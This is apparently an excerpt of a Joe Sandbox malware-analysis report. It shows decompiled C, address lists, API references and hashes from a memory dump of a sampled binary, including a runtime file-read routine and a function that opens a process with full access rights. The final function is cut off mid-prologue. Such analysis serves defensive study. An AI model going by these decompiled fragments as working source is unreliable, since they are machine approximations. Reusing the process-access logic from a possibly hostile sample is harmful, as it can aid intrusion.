0x0042e777
0x0042e77a
0x0042e77c
0x0042e77e
0x0042e79d
0x0042e7a4
0x0042e7ab
0x0042e7ae
0x0042e7ba
0x0042e7bd
0x0042e7c5
0x0042e7c6
0x0042e7c9
0x0042e7c9
0x0042e7cb
0x0042e7d0
0x0042e7d2
0x0042e7d5
0x0042e7dd
0x0042e7e0
0x0042e84d
0x0042e84e
0x0042e854
0x0042e856
0x0042e89f
0x0042e8a2
0x0042e8ab
0x0042e8ae
0x0042e8b1
0x0042e8b3
0x0042e8b3
0x0042e8b3
0x0042e8a4
0x0042e8a7
0x0042e8a7
0x0042e8b8
0x0042e8bb
0x0042e8c7
0x0042e8cc
0x0042e8d8
0x0042e8e2
0x0042e8e6
0x0042e8f0
0x0042e8f3
0x0042e8fe
0x0042e903
0x0042e922
0x0042e925
0x0042e929
0x0042e92a
0x0042e930
0x0042e935
0x0042e938
0x0042e93a
0x0042e93c
0x0042e941
0x0042e943
0x0042e945
0x0042e948
0x0042e94a
0x0042e964
0x0042e988
0x0042e98c
0x0042e990
0x0042e992
0x0042e996
0x0042e998
0x0042e9a2
0x0042e9a5
0x0042e9ac
0x0042e9ac
0x0042e9ac
0x0042e9ac
0x0042e996
0x0042e9b1
0x0042e9bd
0x0042e9bf
0x0042ea4a
0x0042ea4a
0x00000000
0x0042e9c5
0x0042e9c5
0x0042e9c9
0x00000000
0x00000000
0x0042e9ce
0x0042e9e0
0x0042e9e8
0x0042e9eb
0x0042e9ec
0x0042e9ef
0x0042e9f6
0x0042e9fb
0x0042e9fe
0x0042ea32
0x0042ea3c
0x0042ea3c
0x0042ea46
0x00000000
0x0042ea46
0x0042ea07
0x0042ea20
0x0042ea27
0x0042e847
0x00000000
0x0042e847
0x0042e9bf
0x0042e94c
0x00000000
0x0042e905
0x0042e90c
0x0042e90f
0x0042e911
0x00000000
0x00000000
0x0042e913
0x0042e915
0x0042e915
0x00000000
0x0042e91b
0x0042e903
0x0042e85e
0x0042e861
0x0042e87c
0x0042e881
0x0042e887
0x0042e889
0x0042e894
0x0042e894
0x00000000
0x0042e889
0x0042e7e2
0x0042e7e9
0x0042e7eb
0x0042e822
0x0042e822
0x0042e82c
0x0042e82f
0x0042e836
0x0042e836
0x0042e836
0x0042e842
0x00000000
0x0042e842
0x0042e7ed
0x0042e7f1
0x00000000
0x00000000
0x0042e7f3
0x0042e802
0x0042e807
0x0042e80a
0x0042e80b
0x0042e80e
0x0042e80e
0x0042e815
0x0042e817
0x0042e81a
0x0042e81d
0x0042e820
0x00000000
0x00000000
0x00000000
0x0042e780
0x0042e785
0x0042e788
0x0042e78f
0x00000000
0x0042e78f
0x0042e759
0x0042e75e
0x0042e764
0x0042e766
0x00000000
0x0042e76b

APIs

Part of subcall function 0042E3E0: CreateFileW.KERNELBASE(?,00000000,?,0042E7D0,?,?,00000000,?,0042E7D0,?,0000000C), ref: 0042E3FD

GetLastError.KERNEL32 ref: 0042E83B
__dosmaperr.LIBCMT ref: 0042E842
GetFileType.KERNELBASE(00000000), ref: 0042E84E
GetLastError.KERNEL32 ref: 0042E858
__dosmaperr.LIBCMT ref: 0042E861
CloseHandle.KERNEL32(00000000), ref: 0042E881
CloseHandle.KERNEL32(?), ref: 0042E9CE
GetLastError.KERNEL32 ref: 0042EA00
__dosmaperr.LIBCMT ref: 0042EA07

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID:
API String ID: 4237864984-0
Opcode ID: 06122bed1b9b1595c897591bec152c7780b0d53ef97764a841931a55147a754e
Instruction ID: 294b2351a34cc03056aee9017c32f9281aa59cbc487eca680c7c36b5e2bcebcc
Opcode Fuzzy Hash: 06122bed1b9b1595c897591bec152c7780b0d53ef97764a841931a55147a754e
Instruction Fuzzy Hash: 20A14632A101649FCF19EF69EC91BAE3BA1EF46314F18015EF8119B3D1CB389942CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00424EBD Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E00424EBD(signed int _a4, void* _a8, unsigned int _a12) {
				signed int _v5;
				signed int _v12;
				void* _v16;
				signed int _v20;
				long _v24;
				void* _v28;
				char _v32;
				void* _v36;
				long _v40;
				signed int* _t132;
				signed int _t134;
				signed int _t135;
				long _t138;
				signed int _t141;
				signed int _t143;
				signed char _t145;
				intOrPtr _t153;
				long _t155;
				signed int _t156;
				signed int _t157;
				signed int _t159;
				long _t160;
				intOrPtr _t165;
				signed int _t166;
				intOrPtr _t168;
				signed int _t170;
				signed int _t172;
				char _t174;
				char _t179;
				char _t184;
				signed char _t191;
				long _t197;
				signed int _t200;
				intOrPtr _t203;
				long _t204;
				signed int _t205;
				unsigned int _t208;
				signed int _t210;
				signed int _t216;
				signed char _t217;
				long _t218;
				long _t219;
				void* _t220;
				signed int _t221;
				char* _t223;
				char* _t224;
				char* _t225;
				signed int _t230;
				signed int _t231;
				void* _t235;
				void* _t237;
				void* _t238;
				void* _t239;

				_t200 = _a4;
				_t238 = _t237 - 0x24;
				if(_t200 != 0xfffffffe) {
					__eflags = _t200;
					if(_t200 < 0) {
						L60:
						_t132 = E0041CA40();
						 *_t132 =  *_t132 & 0x00000000;
						__eflags =  *_t132;
						 *((intOrPtr*)(E0041CA53())) = 9;
						L61:
						_t134 = E0041804F();
						goto L62;
					}
					__eflags = _t200 -  *0x444d30; // 0x40
					if(__eflags >= 0) {
						goto L60;
					}
					_t216 = _t200 >> 6;
					_t230 = (_t200 & 0x0000003f) * 0x38;
					_v12 = _t216;
					_v32 = 1;
					_t138 =  *((intOrPtr*)(0x444b30 + _t216 * 4));
					_v24 = _t138;
					_v20 = _t230;
					_t217 =  *((intOrPtr*)(_t138 + _t230 + 0x28));
					_v5 = _t217;
					__eflags = 1 & _t217;
					if((1 & _t217) == 0) {
						goto L60;
					}
					_t218 = _a12;
					__eflags = _t218 - 0x7fffffff;
					if(_t218 <= 0x7fffffff) {
						__eflags = _t218;
						if(_t218 == 0) {
							L59:
							_t135 = 0;
							goto L63;
						}
						__eflags = _v5 & 0x00000002;
						if((_v5 & 0x00000002) != 0) {
							goto L59;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							goto L6;
						}
						_t141 =  *((intOrPtr*)(_t138 + _t230 + 0x29));
						_v5 = _t141;
						_v28 =  *((intOrPtr*)(_t138 + _t230 + 0x18));
						_t235 = 0;
						_t143 = _t141 - 1;
						__eflags = _t143;
						if(_t143 == 0) {
							_t145 =  !_t218;
							__eflags = 1 & _t145;
							if((1 & _t145) == 0) {
								L14:
								 *(E0041CA40()) =  *_t146 & _t235;
								 *((intOrPtr*)(E0041CA53())) = 0x16;
								E0041804F();
								goto L40;
							} else {
								_t219 = _t218 >> 1;
								_t197 = 4;
								__eflags = _t219 - 1;
								if(_t219 >= 1) {
									_t197 = _t219;
								}
								_t235 = E00421D39(_t197);
								E00421955(0);
								E00421955(0);
								_t239 = _t238 + 0xc;
								_v16 = _t235;
								__eflags = _t235;
								if(_t235 != 0) {
									_t153 = E00425463(_t219, _a4, 0, 0, 1);
									_t238 = _t239 + 0x10;
									_t203 =  *((intOrPtr*)(0x444b30 + _v12 * 4));
									 *((intOrPtr*)(_t230 + _t203 + 0x20)) = _t153;
									 *(_t230 + _t203 + 0x24) = _t219;
									_t220 = _t235;
									_t155 =  *((intOrPtr*)(0x444b30 + _v12 * 4));
									L22:
									_v24 = _t155;
									L23:
									_t204 = _v24;
									_t230 = 0;
									_t156 = _v20;
									_v36 = _t220;
									__eflags =  *(_t156 + _t204 + 0x28) & 0x00000048;
									_t205 = _a4;
									if(( *(_t156 + _t204 + 0x28) & 0x00000048) != 0) {
										_t174 =  *((intOrPtr*)(_t156 + _v24 + 0x2a));
										_t223 = _v16;
										__eflags = _t174 - 0xa;
										if(_t174 != 0xa) {
											__eflags = _t197;
											if(_t197 != 0) {
												_t230 = 1;
												 *_t223 = _t174;
												_t224 = _t223 + 1;
												_t197 = _t197 - 1;
												__eflags = _v5;
												_v16 = _t224;
												 *((char*)(_v20 +  *((intOrPtr*)(0x444b30 + _v12 * 4)) + 0x2a)) = 0xa;
												_t205 = _a4;
												if(_v5 != 0) {
													_t179 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x444b30 + _v12 * 4)) + 0x2b));
													_t205 = _a4;
													__eflags = _t179 - 0xa;
													if(_t179 != 0xa) {
														__eflags = _t197;
														if(_t197 != 0) {
															 *_t224 = _t179;
															_t225 = _t224 + 1;
															_t197 = _t197 - 1;
															__eflags = _v5 - 1;
															_v16 = _t225;
															_t230 = 2;
															 *((char*)(_v20 +  *((intOrPtr*)(0x444b30 + _v12 * 4)) + 0x2b)) = 0xa;
															_t205 = _a4;
															if(_v5 == 1) {
																_t184 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x444b30 + _v12 * 4)) + 0x2c));
																_t205 = _a4;
																__eflags = _t184 - 0xa;
																if(_t184 != 0xa) {
																	__eflags = _t197;
																	if(_t197 != 0) {
																		 *_t225 = _t184;
																		_t197 = _t197 - 1;
																		__eflags = _t197;
																		_v16 = _t225 + 1;
																		_t230 = 3;
																		 *((char*)(_v20 +  *((intOrPtr*)(0x444b30 + _v12 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t157 = E0042C287(_t205);
									__eflags = _t157;
									if(_t157 == 0) {
										L43:
										_v32 = 0;
										L44:
										_t198 = _v16;
										_t159 = ReadFile(_v28, _v16, _t197,  &_v24, 0); // executed
										__eflags = _t159;
										if(_t159 == 0) {
											L55:
											_t160 = GetLastError();
											_t230 = 5;
											__eflags = _t160 - _t230;
											if(_t160 != _t230) {
												__eflags = _t160 - 0x6d;
												if(_t160 != 0x6d) {
													L39:
													E0041C9F9(_t160);
													goto L40;
												}
												_t231 = 0;
												goto L41;
											}
											 *((intOrPtr*)(E0041CA53())) = 9;
											 *(E0041CA40()) = _t230;
											goto L40;
										}
										_t208 = _a12;
										__eflags = _v24 - _t208;
										if(_v24 > _t208) {
											goto L55;
										}
										_t231 = _t230 + _v24;
										__eflags = _t231;
										L47:
										_t221 = _v20;
										_t165 =  *((intOrPtr*)(0x444b30 + _v12 * 4));
										__eflags =  *((char*)(_t221 + _t165 + 0x28));
										if( *((char*)(_t221 + _t165 + 0x28)) < 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v32;
												_push(_t231 >> 1);
												_push(_v36);
												_push(_a4);
												if(_v32 == 0) {
													_t166 = E00424A2F();
												} else {
													_t166 = E00424D2E();
												}
											} else {
												_t209 = _t208 >> 1;
												__eflags = _t208 >> 1;
												_t166 = E00424BD7(_t208 >> 1, _t208 >> 1, _a4, _t198, _t231, _a8, _t209);
											}
											_t231 = _t166;
										}
										goto L41;
									}
									_t210 = _v20;
									_t168 =  *((intOrPtr*)(0x444b30 + _v12 * 4));
									__eflags =  *((char*)(_t210 + _t168 + 0x28));
									if( *((char*)(_t210 + _t168 + 0x28)) >= 0) {
										goto L43;
									}
									_t170 = GetConsoleMode(_v28,  &_v40);
									__eflags = _t170;
									if(_t170 == 0) {
										goto L43;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L44;
									}
									_t107 =  &_v16; // 0xa
									_t198 =  *_t107;
									_t172 = ReadConsoleW(_v28,  *_t107, _t197 >> 1,  &_v24, 0);
									__eflags = _t172;
									if(_t172 != 0) {
										_t208 = _a12;
										_t231 = _t230 + _v24 * 2;
										goto L47;
									}
									_t160 = GetLastError();
									goto L39;
								} else {
									 *((intOrPtr*)(E0041CA53())) = 0xc;
									 *(E0041CA40()) = 8;
									L40:
									_t231 = _t230 | 0xffffffff;
									__eflags = _t231;
									L41:
									E00421955(_t235);
									_t135 = _t231;
									goto L63;
								}
							}
						}
						__eflags = _t143 == 1;
						if(_t143 == 1) {
							_t191 =  !_t218;
							__eflags = 1 & _t191;
							if((1 & _t191) != 0) {
								_t155 = _v24;
								_t197 = _t218;
								_t220 = _a8;
								_v16 = _t220;
								goto L22;
							}
							goto L14;
						} else {
							_t197 = _t218;
							_t220 = _a8;
							_v16 = _t220;
							goto L23;
						}
					}
					L6:
					 *(E0041CA40()) =  *_t139 & 0x00000000;
					 *((intOrPtr*)(E0041CA53())) = 0x16;
					goto L61;
				} else {
					 *(E0041CA40()) =  *_t192 & 0x00000000;
					_t134 = E0041CA53();
					 *_t134 = 9;
					L62:
					_t135 = _t134 | 0xffffffff;
					L63:
					return _t135;
				}
			}

0x00424ec2
0x00424ec5
0x00424ecd
0x00424ee7
0x00424ee9
0x0042523d
0x0042523d
0x00425242
0x00425242
0x0042524a
0x00425250
0x00425250
0x00000000
0x00425250
0x00424eef
0x00424ef5
0x00000000
0x00000000
0x00424eff
0x00424f05
0x00424f0a
0x00424f0e
0x00424f11
0x00424f18
0x00424f1b
0x00424f1e
0x00424f22
0x00424f25
0x00424f27
0x00000000
0x00000000
0x00424f2d
0x00424f30
0x00424f36
0x00424f50
0x00424f52
0x00425239
0x00425239
0x00000000
0x00425239
0x00424f58
0x00424f5c
0x00000000
0x00000000
0x00424f62
0x00424f66
0x00000000
0x00000000
0x00424f6d
0x00424f71
0x00424f74
0x00424f77
0x00424f7c
0x00424f7c
0x00424f7f
0x00424fc6
0x00424fc8
0x00424fca
0x00424f9b
0x00424fa0
0x00424fa7
0x00424fad
0x00000000
0x00424fcc
0x00424fce
0x00424fd0
0x00424fd1
0x00424fd3
0x00424fd5
0x00424fd5
0x00424fdf
0x00424fe1
0x00424fe8
0x00424fed
0x00424ff0
0x00424ff3
0x00424ff5
0x0042501b
0x00425023
0x00425026
0x0042502d
0x00425034
0x00425038
0x0042503a
0x00425041
0x00425041
0x00425044
0x00425044
0x00425047
0x00425049
0x0042504c
0x0042504f
0x00425054
0x00425057
0x00425060
0x00425064
0x00425067
0x00425069
0x0042506f
0x00425071
0x0042507a
0x0042507b
0x0042507d
0x00425081
0x00425082
0x00425086
0x00425090
0x00425095
0x00425098
0x004250a7
0x004250ab
0x004250ae
0x004250b0
0x004250b2
0x004250b4
0x004250b9
0x004250bb
0x004250bf
0x004250c0
0x004250c6
0x004250d0
0x004250d1
0x004250d6
0x004250d9
0x004250e8
0x004250ec
0x004250ef
0x004250f1
0x004250f3
0x004250f5
0x004250f7
0x004250fd
0x004250fd
0x004250fe
0x0042510d
0x0042510e
0x0042510e
0x004250f5
0x004250f1
0x004250d9
0x004250b4
0x004250b0
0x00425098
0x00425071
0x00425069
0x00425114
0x0042511a
0x0042511c
0x0042518d
0x0042518d
0x00425191
0x00425198
0x0042519f
0x004251a5
0x004251a7
0x00425205
0x00425205
0x0042520d
0x0042520e
0x00425210
0x00425229
0x0042522c
0x00425169
0x0042516a
0x00000000
0x0042516f
0x00425232
0x00000000
0x00425232
0x00425217
0x00425222
0x00000000
0x00425222
0x004251a9
0x004251ac
0x004251af
0x00000000
0x00000000
0x004251b1
0x004251b1
0x004251b4
0x004251b7
0x004251ba
0x004251c1
0x004251c6
0x004251c8
0x004251cc
0x004251e7
0x004251eb
0x004251ec
0x004251ef
0x004251f2
0x004251fe
0x004251f4
0x004251f4
0x004251f4
0x004251ce
0x004251ce
0x004251ce
0x004251d9
0x004251de
0x004251e1
0x004251e1
0x00000000
0x004251c6
0x00425121
0x00425124
0x0042512b
0x00425130
0x00000000
0x00000000
0x00425139
0x0042513f
0x00425141
0x00000000
0x00000000
0x00425143
0x00425147
0x00000000
0x00000000
0x00425152
0x00425152
0x00425159
0x0042515f
0x00425161
0x00425185
0x00425188
0x00000000
0x00425188
0x00425163
0x00000000
0x00424ff7
0x00424ffc
0x00425007
0x00425170
0x00425170
0x00425170
0x00425173
0x00425174
0x0042517a
0x00000000
0x0042517c
0x00424ff5
0x00424fca
0x00424f81
0x00424f84
0x00424f95
0x00424f97
0x00424f99
0x00424fb7
0x00424fba
0x00424fbc
0x00424fbf
0x00000000
0x00424fbf
0x00000000
0x00424f86
0x00424f86
0x00424f88
0x00424f8b
0x00000000
0x00424f8b
0x00424f84
0x00424f38
0x00424f3d
0x00424f45
0x00000000
0x00424ecf
0x00424ed4
0x00424ed7
0x00424edc
0x00425255
0x00425255
0x00425258
0x0042525b
0x0042525b

Strings

, xrefs: 00425152, 00425155

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: ea04b6769f338891359fa753cc2635b305234da14e9e792b99bb4870fbc0c47b
Instruction ID: c73ddf4e9d04ad7a9feba274aac19e014be5869e09d570f887e00602c23fd8a4
Opcode Fuzzy Hash: ea04b6769f338891359fa753cc2635b305234da14e9e792b99bb4870fbc0c47b
Instruction Fuzzy Hash: 7DB13470F04659AFDB11DF99E880BBE7BB1EF85304F44419AE40097392CB789D41CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00403E40 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 240
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 62%

			E00403E40(void* __ebx, void* __edx, void* __edi) {
				int _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				int _v28;
				char _v44;
				int _v68;
				int _v72;
				int _v76;
				int _v108;
				char _v116;
				intOrPtr _v120;
				intOrPtr _v136;
				intOrPtr _v160;
				char _v212;
				char _v228;
				char _v229;
				int _v236;
				intOrPtr* _v240;
				char _v244;
				int _v264;
				char _v272;
				void* __esi;
				void* __ebp;
				signed int _t113;
				signed int _t114;
				long _t134;
				void* _t135;
				intOrPtr _t148;
				signed int _t154;
				signed int _t155;
				void* _t166;
				void* _t167;
				void* _t173;
				intOrPtr* _t177;
				void* _t184;
				intOrPtr _t186;
				intOrPtr* _t194;
				intOrPtr* _t200;
				intOrPtr* _t202;
				void* _t204;
				void* _t210;
				intOrPtr* _t211;
				void* _t215;
				void* _t216;
				intOrPtr* _t217;
				signed int _t219;
				void* _t221;
				signed int _t223;

				_t210 = __edi;
				_t204 = __edx;
				_t179 = __ebx;
				_push(0xffffffff);
				_push(0x431788);
				_push( *[fs:0x0]);
				_t113 =  *0x443048; // 0x35200185
				_t114 = _t113 ^ _t219;
				_v20 = _t114;
				_push(_t114);
				 *[fs:0x0] =  &_v16;
				_v236 = 0;
				E00415180(__edi,  &_v228, 0, 0xb8);
				_v228 = 0x43ea7c;
				_t215 =  >=  ?  *0x443aa4 : 0x443aa4;
				_v108 = 0;
				_v76 = 0;
				_v72 = 0;
				_v68 = 0;
				_t223 = _t221 - 0xe4 + 8;
				_v8 = 0;
				_v236 = 1;
				asm("xorps xmm0, xmm0");
				_v116 = 0x43ea88;
				_v120 = 0x58;
				asm("movlpd [ebp-0xd8], xmm0"); // executed
				E00407F70( &_v116, _t204,  *0x443ab8 - 0x10,  &_v212); // executed
				_v8 = 2;
				_t17 =  &_v228; // 0x43ea7c
				 *((intOrPtr*)(_t219 +  *((intOrPtr*)( *_t17 + 4)) - 0xe0)) = 0x43ea90;
				_t22 = _v228 + 4; // 0x43f75c
				_t23 =  *_t22 - 0x70; // 0x43f6ec
				 *((intOrPtr*)(_t219 +  *_t22 - 0xe4)) = _t23;
				E00407040( &_v212,  *0x443ab8 - 0x10);
				_v8 = 3;
				if(_v136 != 0) {
					L5:
					_t41 = _v228 + 4; // 0x43f75c
					_t184 =  &_v228 +  *_t41;
					__eflags =  *(_t184 + 0x38);
					_t47 = _t184 + 0xc; // 0x443ffc
					__eflags = 0x00000002 + ( *(_t184 + 0x38) == 0x00000000) * 0x00000004 |  *_t47;
					E00403A00(_t179, _t184, 0x00000002 + ( *(_t184 + 0x38) == 0x00000000) * 0x00000004 |  *_t47, 0);
				} else {
					_push(0x40);
					_push(1);
					_t167 = E00412A0C(_t204, 0x443aa4); // executed
					_t223 = _t223 + 0xc;
					if(_t167 == 0) {
						goto L5;
					} else {
						E00406E40( &_v212, _t167, 1);
						_t200 =  *((intOrPtr*)(_v160 + 4));
						_v240 = _t200;
						 *((intOrPtr*)( *_t200 + 4))();
						_v8 = 4;
						_push( &_v244);
						_t173 = E00408400(__ebx, _t204, _t210, _t215);
						_t223 = _t223 + 4;
						E00406CE0( &_v212, _t173);
						_t202 = _v240;
						if(_t202 != 0) {
							_t177 =  *((intOrPtr*)( *((intOrPtr*)( *_t202 + 8))))();
							if(_t177 != 0) {
								 *((intOrPtr*)( *_t177))(1);
							}
						}
					}
				}
				_v8 = 5;
				if(_v136 != 0) {
					asm("xorps xmm0, xmm0");
					_v28 = 0;
					asm("movups [ebp-0x28], xmm0");
					_v24 = 0xf;
					_v44 = 0;
					_v8 = 6;
					L00408360(_t179,  &_v228,  &_v44);
					__eflags = _v24 - 0x10;
					_t133 =  >=  ? _v44 :  &_v44;
					_t134 = E0041B520( &_v44, _t210,  >=  ? _v44 :  &_v44);
					_t223 = _t223 + 4;
					_t135 = OpenProcess(0x1fffff, 0, _t134);
					__eflags = _t135;
					_v8 = 5;
					_t186 = _v24;
					_v229 = _t135 != 0;
					__eflags = _t186 - 0x10;
					if(_t186 < 0x10) {
						L12:
						_v28 = 0;
						_v24 = 0xf;
						_v44 = 0;
						goto L13;
					} else {
						_t207 = _v44;
						_t194 = _t186 + 1;
						_t148 = _v44;
						__eflags = _t194 - 0x1000;
						if(_t194 < 0x1000) {
							L11:
							_push(_t194);
							E004138AD(_t207);
							_t223 = _t223 + 8;
							goto L12;
						} else {
							_t207 =  *((intOrPtr*)(_t148 - 4));
							_t194 = _t194 + 0x23;
							__eflags = _t148 - _t207 + 0xfffffffc - 0x1f;
							if(_t148 - _t207 + 0xfffffffc > 0x1f) {
								E0041805F(_t179, _t194, _t207);
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_push(_t219);
								_push(0xffffffff);
								_push(0x431710);
								_push( *[fs:0x0]);
								_push(_t215);
								_push(_t210);
								_t154 =  *0x443048; // 0x35200185
								_t155 = _t154 ^ _t223;
								__eflags = _t155;
								_push(_t155);
								 *[fs:0x0] =  &_v272;
								_t217 = _t194;
								_t211 = _t217 + 0x70;
								_t95 = _t211 - 0x60; // 0x43ea28
								 *((intOrPtr*)( *((intOrPtr*)( *_t217 + 4)) + _t211 - 0x70)) = 0x43ea90;
								_t100 =  *((intOrPtr*)( *_t217 + 4)) - 0x70; // -107
								 *((intOrPtr*)( *((intOrPtr*)( *_t217 + 4)) + _t211 - 0x74)) = _t100;
								E00405690(_t95);
								 *((intOrPtr*)( *((intOrPtr*)( *_t217 + 4)) + _t211 - 0x70)) = 0x43ea88;
								_t107 =  *((intOrPtr*)( *_t217 + 4)) - 0x18; // -19
								 *((intOrPtr*)( *((intOrPtr*)( *_t217 + 4)) + _t211 - 0x74)) = _t107;
								_v264 = 0;
								 *_t211 = 0x43ea28;
								_t166 = E004128AD(_t211);
								 *[fs:0x0] = _v272;
								return _t166;
							} else {
								goto L11;
							}
						}
					}
				} else {
					_v229 = 0;
					L13:
					_t69 = _v228 + 4; // 0x43f75c
					 *((intOrPtr*)(_t219 +  *_t69 - 0xe0)) = 0x43ea90;
					_t73 = _v228 + 4; // 0x43f75c
					_t74 =  *_t73 - 0x70; // 0x43f6ec
					 *((intOrPtr*)(_t219 +  *_t73 - 0xe4)) = _t74;
					E00405690( &_v212);
					_t79 = _v228 + 4; // 0x43f75c
					 *((intOrPtr*)(_t219 +  *_t79 - 0xe0)) = 0x43ea88;
					_t83 = _v228 + 4; // 0x43fa70
					_t84 =  *_t83 - 0x18; // 0x43fa58
					 *((intOrPtr*)(_t219 +  *_t83 - 0xe4)) = _t84;
					_v8 = 7;
					_v116 = 0x43ea28;
					E004128AD( &_v116);
					 *[fs:0x0] = _v16;
					_pop(_t216);
					return E0041361E(_v229, _t179, _v20 ^ _t219,  *_t83, _t210, _t216);
				}
			}

0x00403e40
0x00403e40
0x00403e40
0x00403e43
0x00403e45
0x00403e50
0x00403e57
0x00403e5c
0x00403e5e
0x00403e62
0x00403e66
0x00403e77
0x00403e84
0x00403e95
0x00403e9f
0x00403ea6
0x00403ead
0x00403eb4
0x00403ebb
0x00403ec2
0x00403ec5
0x00403ed2
0x00403edc
0x00403edf
0x00403ee9
0x00403ef1
0x00403ef9
0x00403efe
0x00403f05
0x00403f0e
0x00403f1f
0x00403f22
0x00403f25
0x00403f32
0x00403f37
0x00403f42
0x00403fb5
0x00403fc3
0x00403fc3
0x00403fc8
0x00403fd5
0x00403fd5
0x00403fd9
0x00403f44
0x00403f44
0x00403f46
0x00403f49
0x00403f4e
0x00403f53
0x00000000
0x00403f55
0x00403f5e
0x00403f69
0x00403f6c
0x00403f74
0x00403f7d
0x00403f81
0x00403f82
0x00403f87
0x00403f91
0x00403f96
0x00403f9e
0x00403fa5
0x00403fa9
0x00403fb1
0x00403fb1
0x00403fa9
0x00403f9e
0x00403f53
0x00403fde
0x00403fec
0x00403ffa
0x00403ffd
0x00404004
0x00404008
0x0040400f
0x00404016
0x00404020
0x00404025
0x0040402c
0x00404031
0x00404036
0x00404041
0x00404047
0x00404049
0x0040404d
0x00404050
0x00404057
0x0040405a
0x00404088
0x00404088
0x0040408f
0x00404096
0x00000000
0x0040405c
0x0040405c
0x0040405f
0x00404060
0x00404062
0x00404068
0x0040407e
0x0040407e
0x00404080
0x00404085
0x00000000
0x0040406a
0x0040406a
0x0040406d
0x00404075
0x00404078
0x0040412d
0x00404132
0x00404133
0x00404134
0x00404135
0x00404136
0x00404137
0x00404138
0x00404139
0x0040413a
0x0040413b
0x0040413c
0x0040413d
0x0040413e
0x0040413f
0x00404140
0x00404143
0x00404145
0x00404150
0x00404151
0x00404152
0x00404153
0x00404158
0x00404158
0x0040415a
0x0040415e
0x00404164
0x00404168
0x0040416b
0x00404171
0x0040417e
0x00404181
0x00404185
0x0040418f
0x0040419c
0x0040419f
0x004041a3
0x004041ab
0x004041b1
0x004041bc
0x004041c9
0x00000000
0x00000000
0x00000000
0x00404078
0x00404068
0x00403fee
0x00403fee
0x0040409a
0x004040a0
0x004040a3
0x004040b4
0x004040b7
0x004040ba
0x004040c7
0x004040d2
0x004040d5
0x004040e6
0x004040e9
0x004040ec
0x004040f6
0x004040fe
0x00404105
0x00404116
0x0040411e
0x0040412c
0x0040412c

APIs

Part of subcall function 00407F70: std::locale::_Init.LIBCPMT ref: 00408002

Part of subcall function 00407040: std::locale::_Init.LIBCPMT ref: 00407092

OpenProcess.KERNEL32(001FFFFF,00000000,00000000,?,35200185), ref: 00404041
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00404105
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004041B1

Part of subcall function 00408400: std::_Lockit::_Lockit.LIBCPMT ref: 00408436
Part of subcall function 00408400: std::_Lockit::_Lockit.LIBCPMT ref: 00408458
Part of subcall function 00408400: std::_Lockit::~_Lockit.LIBCPMT ref: 00408478
Part of subcall function 00408400: std::_Lockit::~_Lockit.LIBCPMT ref: 0040849F

Strings

(C, xrefs: 004040F3, 004040FD
X, xrefs: 00403EE9
|C, xrefs: 00403F05

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: Lockitstd::_$InitIos_base_dtorLockit::_Lockit::~_std::ios_base::_std::locale::_$OpenProcess
String ID: (C$X$|C
API String ID: 2479089509-3218431619
Opcode ID: 3d94ad1747c478087e47a4a932c1e8866e81bd26fb6b1151c57d7ba0964e6dba
Instruction ID: 35d913283e045db799450650ff443e3f9a615b55ca256782a527e1e8516952c6
Opcode Fuzzy Hash: 3d94ad1747c478087e47a4a932c1e8866e81bd26fb6b1151c57d7ba0964e6dba
Instruction Fuzzy Hash: F8A13A74A002499FDB20DF64C949B9DBBF4FF08308F1485AEE509B7281D779AA85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004035C0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 162
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 70%

			E004035C0(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v16;
				char _v24;
				intOrPtr* _v32;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				short _v72;
				char _v76;
				short _v80;
				intOrPtr _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				signed char _v116;
				void* __ebp;
				signed int _t48;
				intOrPtr* _t52;
				void* _t79;
				intOrPtr _t84;
				intOrPtr* _t88;
				intOrPtr _t92;
				intOrPtr* _t93;
				signed int _t96;
				void* _t100;
				signed int _t103;
				void* _t104;
				void* _t107;
				void* _t110;

				_push(__ebx);
				_t79 = _t100;
				_t103 = (_t100 - 0x00000008 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t79 + 4));
				_t96 = _t103;
				_push(0xffffffff);
				_push(0x43153c);
				_push( *[fs:0x0]);
				_push(_t79);
				_t104 = _t103 - 0x50;
				_push(__esi);
				_push(__edi);
				_t48 =  *0x443048; // 0x35200185
				_push(_t48 ^ _t96);
				 *[fs:0x0] =  &_v24;
